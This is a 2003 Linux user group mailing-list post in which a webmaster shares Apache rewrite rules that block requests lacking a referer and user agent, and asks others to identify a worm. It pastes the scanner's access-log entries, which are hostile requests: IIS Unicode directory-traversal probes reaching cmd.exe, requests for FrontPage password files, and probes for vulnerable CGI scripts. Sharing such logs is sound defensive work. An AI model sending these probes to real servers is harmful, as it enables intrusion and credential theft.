[PLUG] Good grief, Charlie Brown (massive worm assault)

Sun May 25 15:30:02 UTC 2003

Any other webmasters logging traffic like this? Any idea what flavor of worm
is at work? This guy consisently got redir'd since his browser reports
neither referer nor agent...

#######################
# No Tickie, No Washie!
#
RewriteRule /duzintwash\.html$ - [NC,L]
RewriteCond %{HTTP_REFERER} ^-?$ [NC]
RewriteCond %{HTTP_USER_AGENT} ^-?$ [NC]
RewriteRule ^.*$ /duzintwash.html [R=301,L]
RewriteCond %{HTTP_REFERER} NULL [NC]
RewriteCond %{HTTP_USER_AGENT} NULL [NC]
RewriteRule ^.*$ /duzintwash.html [R=301,L]

Here's the access_log entries, showing a search for every imaginable object
(134 in under two minutes)...

as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:50 -0700] "GET /.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:51 -0700] "GET /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3455 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:52 -0700] "GET /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3474 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:53 -0700] "GET /_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3452 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:53 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:54 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:55 -0700] "GET /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:55 -0700] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:56 -0700] "GET /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:57 -0700] "GET /_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:57 -0700] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:58 -0700] "GET /_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:59 -0700] "GET /_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:58:59 -0700] "GET /_vti_bin/shtml.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:00 -0700] "GET /_vti_bin/shtml.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:00 -0700] "GET /_vti_inf.html HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:01 -0700] "GET /_vti_pvt/administrators.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:02 -0700] "GET /_vti_pvt/authors.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:02 -0700] "GET /_vti_pvt/service.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:03 -0700] "GET /_vti_pvt/users.pwd HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:04 -0700] "GET /abc/showcode.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:05 -0700] "GET /carbo.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:05 -0700] "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:06 -0700] "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:07 -0700] "GET /cfdocs/expelval/openfile.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:07 -0700] "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:08 -0700] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3454 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:09 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:09 -0700] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:10 -0700] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:11 -0700] "GET /cgi-bin/aglimpse HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:11 -0700] "GET /cgi-bin/AnyForm2 HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:12 -0700] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:13 -0700] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:13 -0700] "GET /cgi-bin/campas HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:14 -0700] "GET /cgi-bin/cgiwrap HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:15 -0700] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:15 -0700] "GET /cgi-bin/edit.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:16 -0700] "GET /cgi-bin/environ.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:17 -0700] "GET /cgi-bin/faxsurvey HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:17 -0700] "GET /cgi-bin/filemail.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:18 -0700] "GET /cgi-bin/files.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:19 -0700] "GET /cgi-bin/finger HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:19 -0700] "GET /cgi-bin/glimpse HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:20 -0700] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:21 -0700] "GET /cgi-bin/handler HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:21 -0700] "GET /cgi-bin/htmlscript HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:22 -0700] "GET /cgi-bin/info2www HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:23 -0700] "GET /cgi-bin/jj HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:23 -0700] "GET /cgi-bin/maillist.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:24 -0700] "GET /cgi-bin/man.sh HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:25 -0700] "GET /cgi-bin/nph-publish HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:25 -0700] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:26 -0700] "GET /cgi-bin/perl.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:27 -0700] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:27 -0700] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:28 -0700] "GET /cgi-bin/phf HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:29 -0700] "GET /cgi-bin/php.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:29 -0700] "GET /cgi-bin/rguest.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:30 -0700] "GET /cgi-bin/rwwwshell.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:31 -0700] "GET /cgi-bin/survey.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:31 -0700] "GET /cgi-bin/test-cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:32 -0700] "GET /cgi-bin/textcounter.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:33 -0700] "GET /cgi-bin/unlg1.1 HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:33 -0700] "GET /cgi-bin/view-source HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:34 -0700] "GET /cgi-bin/webdist.cgi HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:34 -0700] "GET /cgi-bin/webgais HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:35 -0700] "GET /cgi-bin/websendmail HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:36 -0700] "GET /cgi-bin/wguest.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:36 -0700] "GET /cgi-bin/wrap HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:37 -0700] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:38 -0700] "GET /cgi-bin/www-sql HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:38 -0700] "GET /cgi-dos/args.bat HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:39 -0700] "GET /cgi-win/uploader.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:39 -0700] "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:40 -0700] "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:41 -0700] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3452 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:42 -0700] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3465 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:43 -0700] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3471 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:43 -0700] "GET /msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3449 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:44 -0700] "GET /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:45 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:46 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:46 -0700] "GET /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:47 -0700] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:48 -0700] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:49 -0700] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:50 -0700] "GET /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:51 -0700] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:52 -0700] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:53 -0700] "GET /msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:54 -0700] "GET /msadc/..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../winnt/system32/cmd.exe\\?/c\\+dir HTTP/1.0" 301 367 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:54 -0700] "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:55 -0700] "GET /null.ida HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:56 -0700] "GET /null.idc HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:57 -0700] "GET /null.idq HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:58 -0700] "GET /script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3472 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:59 -0700] "GET /script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:14:59:59 -0700] "GET /script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:00 -0700] "GET /script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:01 -0700] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:02 -0700] "GET /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 3462 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:02 -0700] "GET /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3473 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:03 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3445 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 404 3451 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:05 -0700] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:05 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:06 -0700] "GET /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:07 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:07 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:08 -0700] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:09 -0700] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:09 -0700] "GET /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:10 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:10 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:11 -0700] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:12 -0700] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:13 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:13 -0700] "GET /scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:14 -0700] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:15 -0700] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 301 374 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:15 -0700] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:16 -0700] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 330 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:17 -0700] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:18 -0700] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:18 -0700] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:19 -0700] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 364 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:20 -0700] "GET /scripts/CGImail.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:20 -0700] "GET /scripts/fpcount.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:21 -0700] "GET /scripts/iisadmin/ism.dll HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:22 -0700] "GET /scripts/issadmin/bdir.htr HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:23 -0700] "GET /scripts/tools/newdsn.exe HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:23 -0700] "GET /search97.vts HTTP/1.0" 301 357 "-" "-"
as1po121.il.ficnet.net.tw - - [25/May/2003:15:00:30 -0700] "GET / HTTP/1.0" 301 357 "-" "-"

Sandy
-- 
Sandy Herring, RHCE                        o              sandy at herring.org
Peck of Pickled Pisces               __  o               http://herring.org/
UNIX or Web authoring questions?  |\/ o\  o  http://herring.org/finger.html
->http://herring.org/techie.html  |/\__/     http://herring.org/pub-key.asc
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL: <http://lists.pdxlinux.org/pipermail/plug/attachments/20030525/d0300cce/attachment.asc>